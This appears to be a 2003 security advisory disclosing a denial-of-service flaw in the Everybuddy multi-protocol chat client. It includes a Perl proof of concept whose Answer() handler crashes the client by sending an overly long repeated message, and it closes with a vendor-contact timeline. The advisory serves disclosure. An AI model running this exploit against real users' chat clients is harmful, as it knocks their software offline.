Everybuddy Vulnerable to a DoS Attack (Long Message)
5 Aug. 2003
Summary
Everybuddy has support for AIM, ICQ, MSN, Yahoo! and Jabber chat programs. The program contains a security vulnerability that allows remote attackers to crash it by sending it an overly long instant message.
    sub Status {
        my ($self, $username, $newstatus) = @_;
        print "Status() called with parameters:\n";
        print " " . join(",", @_), "\n";
        # Print the status change info.
        print "${username}'s status changed from " . $self->buddystatus($username) . " to $newstatus.\n";
        # Initiate the call.
        $self->call($username);
        # The call may take a few seconds to complete, so we can't
        # immediately send messages. Let's put the message in a
        # FIFO (queue) that is keyed by username.
        push (@{$queue{$username}}, "Glad to see you online!");
    }

    sub Message {
        my ($self, $username, undef, $msg) = @_;
        print "Message() called with parameters:\n";
        print " " . join(",", @_), "\n";
    }

    sub Join {
        my ($self, $username) = @_;
        print "Join() called with parameters:\n";
        print " " . join(",", @_), "\n";
        # See if there's anything queued up.
        # Deliver each message if there is stuff in the queue for this user.
        while ($_ = shift @{$queue{$username}}) {
            $$self->sendmsg($_);
        }
    }

    sub Answer {
        my ($self, $username) = @_;
        print "Answer() called with parameters:\n";
        print " " . join(",", @_), "\n";
        # Send the overly long message: the string below repeated 55 times.
        $$self->sendmsg("AAAAAAAAAAAAAAAAAAAAAAAAAAA\r"x55);
    }
Vendor status:
After numerous attempts to contact the vendor (in some cases the vendor replied, but then disappeared again), we are forced to release this information without having received a proper response from them.
Disclosure timeline:
19/06/2003 - First attempt to contact vendor
20/06/2003 - First vendor response
22/06/2003 - PoC provided to vendor
01/07/2003 - Second attempt to contact vendor
01/08/2003 - Third attempt to contact vendor
05/08/2003 - Public advisory